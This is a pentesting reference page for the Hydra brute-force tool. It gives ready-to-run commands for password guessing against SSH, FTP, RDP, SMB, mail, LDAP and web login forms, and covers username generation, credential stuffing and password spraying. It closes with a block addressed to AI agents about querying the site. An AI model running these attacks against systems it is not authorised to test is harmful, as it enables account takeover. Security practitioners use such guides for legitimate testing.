# Hydra User Guide * > **Note:** For HTTP form brute force, prefer **ffuf** over hydra — it is faster and more flexible. See the [ffuf guide](/tool-guides/ffuf.md#http-brute-force-login-forms). ## Username Generation with username-anarchy When you know a person's name but not their username format, generate variations: ```bash ./username-anarchy firstname lastname > /tmp/usernames.txt # Example: ./username-anarchy betty jayde > /tmp/usernames.txt # Generates: betty, bettyjayde, betty.jayde, bettyjay, bettyj, b.jayde, bjayde, jbetty, j.betty, jaydeb, jayde, bj, etc. ``` Then brute force with the generated list: ```bash hydra -t 4 -L /tmp/usernames.txt -p 'Texas123!@#' ssh://10.129.7.222 -F -vV ``` ## Installation ```bash sudo apt-get -y install hydra ``` *** ## Basic Syntax ```bash hydra [login_options] [password_options] [attack_options] [service_options] ``` *** ## Options Table | Option | Description | Example | | -------------------- | ------------------------------------- | ---------------------------- | | `-l LOGIN` | Single username | `hydra -l admin ...` | | `-L FILE` | Username list file | `hydra -L users.txt ...` | | `-p PASS` | Single password | `hydra -p password123 ...` | | `-P FILE` | Password list file | `hydra -P passwords.txt ...` | | `-t TASKS` | Parallel tasks (threads) | `hydra -t 4 ...` | | `-f` | Stop after first valid login | `hydra -f ...` | | `-F` | Stop after first valid login (global) | `hydra -F ...` | | `-s PORT` | Non-default port | `hydra -s 2222 ...` | | `-v` / `-V` | Verbose / Very verbose | `hydra -V ...` | | `-M FILE` | List of target servers | `hydra -M targets.txt ...` | | `-x MIN:MAX:CHARSET` | Generate passwords | `hydra -x 6:8:a1 ...` | *** ## Services Table | Service | Protocol | Example | | ----------------- | ---------------------- | ------------------------------------------------------- | | `ssh` | SSH | `hydra -l root -P pass.txt ssh://192.168.1.100` | | `ftp` | FTP | `hydra -l admin -P pass.txt ftp://192.168.1.100` | | `http-get` | HTTP Basic Auth | `hydra -L users.txt -P pass.txt example.com http-get /` | | `http-post-form` | Web Login Form (HTTP) | See below | | `https-post-form` | Web Login Form (HTTPS) | Same syntax as http-post-form, use for HTTPS | | `rdp` | Remote Desktop | `hydra -l admin -P pass.txt rdp://192.168.1.100` | | `smb` | SMB | `hydra -l admin -P pass.txt 192.168.1.100 smb` | | `mysql` | MySQL | `hydra -l root -P pass.txt mysql://192.168.1.100` | | `mssql` | MS SQL Server | `hydra -l sa -P pass.txt mssql://192.168.1.100` | | `vnc` | VNC | `hydra -P pass.txt vnc://192.168.1.100` | | `pop3` | POP3 Mail | `hydra -l user -P pass.txt pop3://mail.server.com` | | `imap` | IMAP Mail | `hydra -l user -P pass.txt imap://mail.server.com` | | `smtp` | SMTP Mail | `hydra -l user -P pass.txt smtp://mail.server.com` | | `telnet` | Telnet | `hydra -L users.txt -P pass.txt telnet://192.168.1.100` | | `ldap2` | LDAP | `hydra -L users.txt -P pass.txt 192.168.1.100 ldap2` | | `snmp` | SNMP | `hydra -P pass.txt 192.168.1.100 snmp` | *** ## Hydra Syntax * The correct hydra syntax is depended upon the service you are going after. For example if we want to hit ftp we should use: ## FTP ``` hydra -l user -P passlist.txt ftp://10.10.10.10 -F ``` ## Telnet ```bash hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 3 telnet://TARGET -F -vV ``` Telnet can be unreliable for Hydra to analyze. Manually validate any hit with `telnet TARGET 23` before trusting the result. ## SSH ``` hydra -l -P /usr/share/wordlists/rockyou.txt 10.10.10.10 -t 4 ssh ``` * `-l` is to specify the username * `P` is to specify a password list * `-t` is to specify the number of threads to run hydra with. * Note: Hydra recommends no more than 4 threads, however you can run it faster with `-t 16`. * `-F` means stop when you find your first valid password, highly recommend this option ``` hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://$host -f hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt ssh://$host -f -s 2222 hydra -L user.txt -P password.txt -f ssh://10.10.15.2:31294 -t 4 -w 15 -F ``` ## POST Web Form * Hydra can be used to brute force web logins as well. * Step 1: Determine the request made to the form (POST/GET) * Identify this in the network tab (developer tools), view the source code, or use Burp Suite. ### Syntax ``` hydra [options] target http-post-form "path:params:condition_string" ``` ### Success vs Failure Conditions | Condition | Description | Example | | ---------- | ----------------------------------------------- | ----------------------- | | `F=string` | **Failure** - Text in response when login fails | `F=Invalid credentials` | | `S=string` | **Success** - Text in response when login works | `S=Dashboard` | | `S=302` | **Success** - HTTP redirect on successful login | `S=302` | **Use `F=` when you know the failure message (most common):** ```bash hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid credentials" # HTTPS form (e.g. phpLiteAdmin), limit threads for stability hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt TARGET_IP https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 3 ``` **Use `S=` when you know what success looks like:** ```bash hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=302" hydra -l admin -P pass.txt example.com http-post-form "/login:user=^USER^&pass=^PASS^:S=Welcome" ``` ### Full Example ``` hydra -l -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -vV ``` * `http-post-form` specifies the type of form * `/login url` the login page URL i.e. `http://dont-brute-force-me.com/login.php` * `:username` the form field name for the username * `^USER^` this tells hydra to use the username you specified * `password` the form field name for the password * `^PASS^` the password list specified in the command * `F=incorrect` the word that appears on the page if the login fails * `-vV` specifies very verbose output * Hydra non default ssh port: ``` hydra -t 16 -l sam -P /usr/share/wordlists/rockyou.txt 10.10.80.187 ssh -s 4567 -vV ``` ### HTTP-GET * Basic Authentication HTTP-GET ``` hydra -vV -l administrator -P 2023-200_most_used_passwords.txt 10.13.38.11 http-get /admin/ hydra -vV -t 2 -l administrator -P /usr/share/seclists/Passwords/seasons.txt 10.13.38.11 http-get /admin/ ``` ## Example Syntax ``` #Hydra brute force against SNMP hydra -P password-file.txt -v $ip snmp #Hydra FTP known user and rockyou password list hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp #Hydra SSH using list of users and passwords hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh #Hydra SSH using a known password and a username list hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh #Hydra SSH Against Known username on port 22 hydra $ip -s 22 ssh -l -P big_wordlist.txt #Hydra POP3 Brute Force hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f $ip pop3 -V #Hydra SMTP Brute Force hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V #Hydra attack http get 401 login with a dictionary hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin #Hydra attack Windows Remote Desktop with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip #Hydra brute force SMB user with rockyou hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb #Hydra brute force a Wordpress admin hydra -l admin -P ./passwordlist.txt $ip -V http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' login #SMB Brute Forcing hydra -L usernames.txt -P passwords.txt $ip smb -V -f #LDAP Brute Forcing hydra -L users.txt -P passwords.txt $ip ldap2 -V -f ``` ## Additional Syntax Formats ``` sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" sudo hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.211.150 http-post-form "/login:username=molly&password=^PASS^:F=incorrect" -V sudo hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin hydra -l lazie -P /opt/rockyou.txt imap://10.10.251.142 -vV ``` *** ### Credential Stuffing * Use `-C` with a colon-separated `user:pass` file instead of separate user and password lists ``` hydra -C user_pass.list ssh://10.100.38.23 ``` ### Password Spraying (SMB via NetExec) ``` netexec smb 10.100.38.0/24 -u usernames.list -p 'ChangeMe123!' ``` ### Default Credentials Cheat Sheet ``` pip3 install defaultcreds-cheat-sheet creds search linksys ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.ice-wzl.xyz/tool-guides/hydra.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.